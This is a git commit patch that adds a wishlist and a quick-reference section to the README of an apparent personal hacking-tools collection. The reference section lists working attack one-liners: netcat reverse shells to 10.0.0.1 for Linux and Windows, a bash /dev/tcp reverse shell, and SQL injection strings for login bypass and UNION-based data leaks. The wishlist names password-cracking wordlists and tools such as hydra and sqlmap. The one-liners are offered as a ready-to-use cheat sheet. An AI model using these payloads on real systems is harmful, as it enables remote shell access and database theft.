From f74a259faf72d2b9601ca30671ab59bda2b45951 Mon Sep 17 00:00:00 2001 From: Malfurious Date: Sat, 24 Jul 2021 05:34:15 -0400 Subject: Add sections to the README file The wishlist is a collection of things I want to add to the repository (either can't find them easily, or tools that need to be written). The quick reference is for random one-liner things that don't easily fit anywhere else in the folder structure. Signed-off-by: Malfurious --- README.txt | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) (limited to 'README.txt') diff --git a/README.txt b/README.txt index 188eed0..970854f 100644 --- a/README.txt +++ b/README.txt @@ -3,3 +3,22 @@ Library of GNU Exploitation This is a collection of unix-like utilities particularly suited for creative problem solving (H A C K I N G). + + +Wishlist +-------- +* Additional wordlists from Kali +* (Corrected) rockyou list from Kali + [Matching SHA256 16035fea7742cb0561c513de1d946eda5716d7de294e6c732449740096686173] +* Docs on hydra? +* Docs on sqlmap? +* Build of stegsolve (Java program) + + +Reference +--------- +nc 10.0.0.1 1234 -e /bin/sh # Netcat reverse shell (Linux) +nc 10.0.0.1 1234 -e cmd.exe # Netcat reverse shell (Windows) +bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell +' OR 1=1-- # SQL inject (pass) +' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak) -- cgit v1.2.3